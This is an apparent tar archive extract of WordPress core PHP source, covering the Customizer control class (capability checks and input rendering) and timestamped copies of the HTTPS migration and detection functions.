*/
final public function check_capabilities() {
if ( ! empty( $this->capability ) && ! current_user_can( $this->capability ) ) {
return false;
}
foreach ( $this->settings as $setting ) {
if ( ! $setting || ! $setting->check_capabilities() ) {
return false;
}
}
$section = $this->manager->get_section( $this->section );
if ( isset( $section ) && ! $section->check_capabilities() ) {
return false;
}
return true;
}
/**
* Gets the control's content for insertion into the Customizer pane.
*
* @since 4.1.0
*
* @return string Contents of the control.
*/
final public function get_content() {
ob_start();
$this->maybe_render();
return trim( ob_get_clean() );
}
/**
* Checks capabilities and render the control.
*
* @since 3.4.0
* @uses WP_Customize_Control::render()
*/
final public function maybe_render() {
if ( ! $this->check_capabilities() ) {
return;
}
/**
* Fires just before the current Customizer control is rendered.
*
* @since 3.4.0
*
* @param WP_Customize_Control $control WP_Customize_Control instance.
*/
do_action( 'customize_render_control', $this );
/**
* Fires just before a specific Customizer control is rendered.
*
* The dynamic portion of the hook name, `$this->id`, refers to
* the control ID.
*
* @since 3.4.0
*
* @param WP_Customize_Control $control WP_Customize_Control instance.
*/
do_action( "customize_render_control_{$this->id}", $this );
$this->render();
}
/**
* Renders the control wrapper and calls $this->render_content() for the internals.
*
* @since 3.4.0
*/
protected function render() {
$id = 'customize-control-' . str_replace( array( '[', ']' ), array( '-', '' ), $this->id );
$class = 'customize-control customize-control-' . $this->type;
printf( '<li id="%s" class="%s">', esc_attr( $id ), esc_attr( $class ) );
$this->render_content();
echo '</li>';
}
/**
* Gets the data link attribute for a setting.
*
* @since 3.4.0
* @since 4.9.0 Return a `data-customize-setting-key-link` attribute if a setting is not registered for the supplied setting key.
*
* @param string $setting_key
* @return string Data link parameter, a `data-customize-setting-link` attribute if the `$setting_key` refers
* to a pre-registered setting, and a `data-customize-setting-key-link` attribute if the setting
* is not yet registered.
*/
public function get_link( $setting_key = 'default' ) {
if ( isset( $this->settings[ $setting_key ] ) && $this->settings[ $setting_key ] instanceof WP_Customize_Setting ) {
return 'data-customize-setting-link="' . esc_attr( $this->settings[ $setting_key ]->id ) . '"';
} else {
return 'data-customize-setting-key-link="' . esc_attr( $setting_key ) . '"';
}
}
/**
* Renders the data link attribute for the control's input element.
*
* @since 3.4.0
* @uses WP_Customize_Control::get_link()
*
* @param string $setting_key Default 'default'.
*/
public function link( $setting_key = 'default' ) {
echo $this->get_link( $setting_key );
}
/**
* Renders the custom attributes for the control's input element.
*
* @since 4.0.0
*/
public function input_attrs() {
foreach ( $this->input_attrs as $attr => $value ) {
echo $attr . '="' . esc_attr( $value ) . '" ';
}
}
/**
* Renders the control's content.
*
* Allows the content to be overridden without having to rewrite the wrapper in `$this::render()`.
*
* Supports basic input types `text`, `checkbox`, `textarea`, `radio`, `select` and `dropdown-pages`.
* Additional input types such as `email`, `url`, `number`, `hidden` and `date` are supported implicitly.
*
* Control content can alternately be rendered in JS. See WP_Customize_Control::print_template().
*
* @since 3.4.0
*/
protected function render_content() {
$input_id = '_customize-input-' . $this->id;
$description_id = '_customize-description-' . $this->id;
$describedby_attr = ( ! empty( $this->description ) ) ? ' aria-describedby="' . esc_attr( $description_id ) . '" ' : '';
switch ( $this->type ) {
case 'checkbox':
?>
<span class="customize-inside-control-row">
<input
id="<?php echo esc_attr( $input_id ); ?>"
<?php echo $describedby_attr; ?>
type="checkbox"
value="<?php echo esc_attr( $this->value() ); ?>"
<?php $this->link(); ?>
<?php checked( $this->value() ); ?>
/>
<label for="<?php echo esc_attr( $input_id ); ?>"><?php echo esc_html( $this->label ); ?></label>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
</span>
<?php
break;
case 'radio':
if ( empty( $this->choices ) ) {
return;
}
$name = '_customize-radio-' . $this->id;
?>
<?php if ( ! empty( $this->label ) ) : ?>
<span class="customize-control-title"><?php echo esc_html( $this->label ); ?></span>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<?php foreach ( $this->choices as $value => $label ) : ?>
<span class="customize-inside-control-row">
<input
id="<?php echo esc_attr( $input_id . '-radio-' . $value ); ?>"
type="radio"
<?php echo $describedby_attr; ?>
value="<?php echo esc_attr( $value ); ?>"
name="<?php echo esc_attr( $name ); ?>"
<?php $this->link(); ?>
<?php checked( $this->value(), $value ); ?>
/>
<label for="<?php echo esc_attr( $input_id . '-radio-' . $value ); ?>"><?php echo esc_html( $label ); ?></label>
</span>
<?php endforeach; ?>
<?php
break;
case 'select':
if ( empty( $this->choices ) ) {
return;
}
?>
<?php if ( ! empty( $this->label ) ) : ?>
<label for="<?php echo esc_attr( $input_id ); ?>" class="customize-control-title"><?php echo esc_html( $this->label ); ?></label>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<select id="<?php echo esc_attr( $input_id ); ?>" <?php echo $describedby_attr; ?> <?php $this->link(); ?>>
<?php
foreach ( $this->choices as $value => $label ) {
echo '<option value="' . esc_attr( $value ) . '"' . selected( $this->value(), $value, false ) . '>' . esc_html( $label ) . '</option>';
}
?>
</select>
<?php
break;
case 'textarea':
if ( ! array_key_exists( 'rows', $this->input_attrs ) ) {
$this->input_attrs['rows'] = 5;
}
?>
<?php if ( ! empty( $this->label ) ) : ?>
<label for="<?php echo esc_attr( $input_id ); ?>" class="customize-control-title"><?php echo esc_html( $this->label ); ?></label>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<textarea
id="<?php echo esc_attr( $input_id ); ?>"
<?php echo $describedby_attr; ?>
<?php $this->input_attrs(); ?>
<?php $this->link(); ?>
><?php echo esc_textarea( $this->value() ); ?></textarea>
<?php
break;
case 'dropdown-pages':
?>
<?php if ( ! empty( $this->label ) ) : ?>
<label for="<?php echo esc_attr( $input_id ); ?>" class="customize-control-title"><?php echo esc_html( $this->label ); ?></label>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<?php
$dropdown_name = '_customize-dropdown-pages-' . $this->id;
$show_option_none = __( '— Select —' );
$option_none_value = '0';
$dropdown = wp_dropdown_pages(
array(
'name' => $dropdown_name,
'echo' => 0,
'show_option_none' => $show_option_none,
'option_none_value' => $option_none_value,
'selected' => $this->value(),
)
);
if ( empty( $dropdown ) ) {
$dropdown = sprintf( '<select id="%1$s" name="%1$s">', esc_attr( $dropdown_name ) );
$dropdown .= sprintf( '<option value="%1$s">%2$s</option>', esc_attr( $option_none_value ), esc_html( $show_option_none ) );
$dropdown .= '</select>';
}
// Hackily add in the data link parameter.
$dropdown = str_replace( '<select', '<select ' . $this->get_link() . ' id="' . esc_attr( $input_id ) . '" ' . $describedby_attr, $dropdown );
/*
* Even more hackily add auto-draft page stubs.
* @todo Eventually this should be removed in favor of the pages being injected into the underlying get_pages() call.
* See <https://github.com/xwp/wp-customize-posts/pull/250>.
*/
$nav_menus_created_posts_setting = $this->manager->get_setting( 'nav_menus_created_posts' );
if ( $nav_menus_created_posts_setting && current_user_can( 'publish_pages' ) ) {
$auto_draft_page_options = '';
foreach ( $nav_menus_created_posts_setting->value() as $auto_draft_page_id ) {
$post = get_post( $auto_draft_page_id );
if ( $post && 'page' === $post->post_type ) {
$auto_draft_page_options .= sprintf( '<option value="%1$s">%2$s</option>', esc_attr( $post->ID ), esc_html( $post->post_title ) );
}
}
if ( $auto_draft_page_options ) {
$dropdown = str_replace( '</select>', $auto_draft_page_options . '</select>', $dropdown );
}
}
echo $dropdown;
?>
<?php if ( $this->allow_addition && current_user_can( 'publish_pages' ) && current_user_can( 'edit_theme_options' ) ) : // Currently tied to menus functionality. ?>
<button type="button" class="button-link add-new-toggle">
<?php
/* translators: %s: Add Page label. */
printf( __( '+ %s' ), get_post_type_object( 'page' )->labels->add_new_item );
?>
</button>
<div class="new-content-item-wrapper">
<label for="create-input-<?php echo esc_attr( $this->id ); ?>"><?php _e( 'New page title' ); ?></label>
<div class="new-content-item">
<input type="text" id="create-input-<?php echo esc_attr( $this->id ); ?>" class="create-item-input form-required">
<button type="button" class="button add-content"><?php _e( 'Add' ); ?></button>
</div>
<span id="create-input-<?php echo esc_attr( $this->id ); ?>-error" class="create-item-error error-message" style="display: none;"><?php _e( 'Please enter a page title' ); ?></span>
</div>
<?php endif; ?>
<?php
break;
default:
?>
<?php if ( ! empty( $this->label ) ) : ?>
<label for="<?php echo esc_attr( $input_id ); ?>" class="customize-control-title"><?php echo esc_html( $this->label ); ?></label>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<input
id="<?php echo esc_attr( $input_id ); ?>"
type="<?php echo esc_attr( $this->type ); ?>"
<?php echo $describedby_attr; ?>
<?php $this->input_attrs(); ?>
<?php if ( ! isset( $this->input_attrs['value'] ) ) : ?>
value="<?php echo esc_attr( $this->value() ); ?>"
<?php endif; ?>
<?php $this->link(); ?>
/>
<?php
break;
}
}
/**
* Renders the control's JS template.
*
* This function is only run for control types that have been registered with
* WP_Customize_Manager::register_control_type().
*
* In the future, this will also print the template for the control's container
* element and be override-able.
*
* @since 4.1.0
*/
final public function print_template() {
?>
<script type="text/html" id="tmpl-customize-control-<?php echo esc_attr( $this->type ); ?>-content">
<?php $this->content_template(); ?>
</script>
<?php
}
/**
* An Underscore (JS) template for this control's content (but not its container).
*
* Class variables for this control class are available in the `data` JS object;
* export custom variables by overriding WP_Customize_Control::to_json().
*
* @see WP_Customize_Control::print_template()
*
* @since 4.1.0
*/
protected function content_template() {}
}
/**
* WP_Customize_Color_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-color-control.php';
/**
* WP_Customize_Media_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-media-control.php';
/**
* WP_Customize_Upload_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-upload-control.php';
/**
* WP_Customize_Image_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-image-control.php';
/**
* WP_Customize_Background_Image_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-background-image-control.php';
/**
* WP_Customize_Background_Position_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-background-position-control.php';
/**
* WP_Customize_Cropped_Image_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-cropped-image-control.php';
/**
* WP_Customize_Site_Icon_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-site-icon-control.php';
/**
* WP_Customize_Header_Image_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-header-image-control.php';
/**
* WP_Customize_Theme_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-theme-control.php';
/**
* WP_Widget_Area_Customize_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-widget-area-customize-control.php';
/**
* WP_Widget_Form_Customize_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-widget-form-customize-control.php';
/**
* WP_Customize_Nav_Menu_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-control.php';
/**
* WP_Customize_Nav_Menu_Item_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-item-control.php';
/**
* WP_Customize_Nav_Menu_Location_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-location-control.php';
/**
* WP_Customize_Nav_Menu_Name_Control class.
*
* As this file is deprecated, it will trigger a deprecation notice if instantiated. In a subsequent
* release, the require_once here will be removed and _deprecated_file() will be called if file is
* required at all.
*
* @deprecated 4.9.0 This file is no longer used due to new menu creation UX.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-name-control.php';
/**
* WP_Customize_Nav_Menu_Locations_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-locations-control.php';
/**
* WP_Customize_Nav_Menu_Auto_Add_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-auto-add-control.php';
/**
* WP_Customize_Date_Time_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-date-time-control.php';
/**
* WP_Sidebar_Block_Editor_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-sidebar-block-editor-control.php';
https-migration-20260605175519.php 0000666 00000011205 15224151220 0012001 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605034026.php 0000666 00000013341 15224151220 0011754 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605114228.php 0000666 00000011205 15224151220 0011767 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-customize-control.php 0000666 00000063007 15224151220 0012510 0 ustar 00 <?php
/**
* WordPress Customize Control classes
*
* @package WordPress
* @subpackage Customize
* @since 3.4.0
*/
// Don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
die( '-1' );
}
/**
* Customize Control class.
*
* @since 3.4.0
*/
#[AllowDynamicProperties]
class WP_Customize_Control {
/**
* Incremented with each new class instantiation, then stored in $instance_number.
*
* Used when sorting two instances whose priorities are equal.
*
* @since 4.1.0
* @var int
*/
protected static $instance_count = 0;
/**
* Order in which this instance was created in relation to other instances.
*
* @since 4.1.0
* @var int
*/
public $instance_number;
/**
* Customizer manager.
*
* @since 3.4.0
* @var WP_Customize_Manager
*/
public $manager;
/**
* Control ID.
*
* @since 3.4.0
* @var string
*/
public $id;
/**
* All settings tied to the control.
*
* @since 3.4.0
* @var array
*/
public $settings;
/**
* The primary setting for the control (if there is one).
*
* @since 3.4.0
* @var string|WP_Customize_Setting|null
*/
public $setting = 'default';
/**
* Capability required to use this control.
*
* Normally this is empty and the capability is derived from the capabilities
* of the associated `$settings`.
*
* @since 4.5.0
* @var string
*/
public $capability;
/**
* Order priority to load the control in Customizer.
*
* @since 3.4.0
* @var int
*/
public $priority = 10;
/**
* Section the control belongs to.
*
* @since 3.4.0
* @var string
*/
public $section = '';
/**
* Label for the control.
*
* @since 3.4.0
* @var string
*/
public $label = '';
/**
* Description for the control.
*
* @since 4.0.0
* @var string
*/
public $description = '';
/**
* List of choices for 'radio' or 'select' type controls, where values are the keys, and labels are the values.
*
* @since 3.4.0
* @var array
*/
public $choices = array();
/**
* List of custom input attributes for control output, where attribute names are the keys and values are the values.
*
* Not used for 'checkbox', 'radio', 'select', or 'dropdown-pages' control types.
*
* @since 4.0.0
* @var array
*/
public $input_attrs = array();
/**
* Show UI for adding new content, currently only used for the dropdown-pages control.
*
* @since 4.7.0
* @var bool
*/
public $allow_addition = false;
/**
* @deprecated It is better to just call the json() method
* @since 3.4.0
* @var array
*/
public $json = array();
/**
* Control's Type.
*
* @since 3.4.0
* @var string
*/
public $type = 'text';
/**
* Callback.
*
* @since 4.0.0
*
* @see WP_Customize_Control::active()
*
* @var callable Callback is called with one argument, the instance of
* WP_Customize_Control, and returns bool to indicate whether
* the control is active (such as it relates to the URL
* currently being previewed).
*/
public $active_callback = '';
/**
* Constructor.
*
* Supplied `$args` override class property defaults.
*
* If `$args['settings']` is not defined, use the `$id` as the setting ID.
*
* @since 3.4.0
*
* @param WP_Customize_Manager $manager Customizer bootstrap instance.
* @param string $id Control ID.
* @param array $args {
* Optional. Array of properties for the new Control object. Default empty array.
*
* @type int $instance_number Order in which this instance was created in relation
* to other instances.
* @type WP_Customize_Manager $manager Customizer bootstrap instance.
* @type string $id Control ID.
* @type array $settings All settings tied to the control. If undefined, `$id` will
* be used.
* @type string $setting The primary setting for the control (if there is one).
* Default 'default'.
* @type string $capability Capability required to use this control. Normally this is empty
* and the capability is derived from `$settings`.
* @type int $priority Order priority to load the control. Default 10.
* @type string $section Section the control belongs to. Default empty.
* @type string $label Label for the control. Default empty.
* @type string $description Description for the control. Default empty.
* @type array $choices List of choices for 'radio' or 'select' type controls, where
* values are the keys, and labels are the values.
* Default empty array.
* @type array $input_attrs List of custom input attributes for control output, where
* attribute names are the keys and values are the values. Not
* used for 'checkbox', 'radio', 'select', or 'dropdown-pages'
* control types. Default empty array.
* @type bool $allow_addition Show UI for adding new content, currently only used for the
* dropdown-pages control. Default false.
* @type array $json Deprecated. Use WP_Customize_Control::json() instead.
* @type string $type Control type. Core controls include 'text', 'checkbox',
* 'textarea', 'radio', 'select', and 'dropdown-pages'. Additional
* input types such as 'email', 'url', 'number', 'hidden', and
* 'date' are supported implicitly. Default 'text'.
* @type callable $active_callback Active callback.
* }
*/
public function __construct( $manager, $id, $args = array() ) {
$keys = array_keys( get_object_vars( $this ) );
foreach ( $keys as $key ) {
if ( isset( $args[ $key ] ) ) {
$this->$key = $args[ $key ];
}
}
$this->manager = $manager;
$this->id = $id;
if ( empty( $this->active_callback ) ) {
$this->active_callback = array( $this, 'active_callback' );
}
self::$instance_count += 1;
$this->instance_number = self::$instance_count;
// Process settings.
if ( ! isset( $this->settings ) ) {
$this->settings = $id;
}
$settings = array();
if ( is_array( $this->settings ) ) {
foreach ( $this->settings as $key => $setting ) {
$settings[ $key ] = $this->manager->get_setting( $setting );
}
} elseif ( is_string( $this->settings ) ) {
$this->setting = $this->manager->get_setting( $this->settings );
$settings['default'] = $this->setting;
}
$this->settings = $settings;
}
/**
* Enqueues control related scripts/styles.
*
* @since 3.4.0
*/
public function enqueue() {}
/**
* Checks whether control is active to current Customizer preview.
*
* @since 4.0.0
*
* @return bool Whether the control is active to the current preview.
*/
final public function active() {
$control = $this;
$active = call_user_func( $this->active_callback, $this );
/**
* Filters response of WP_Customize_Control::active().
*
* @since 4.0.0
*
* @param bool $active Whether the Customizer control is active.
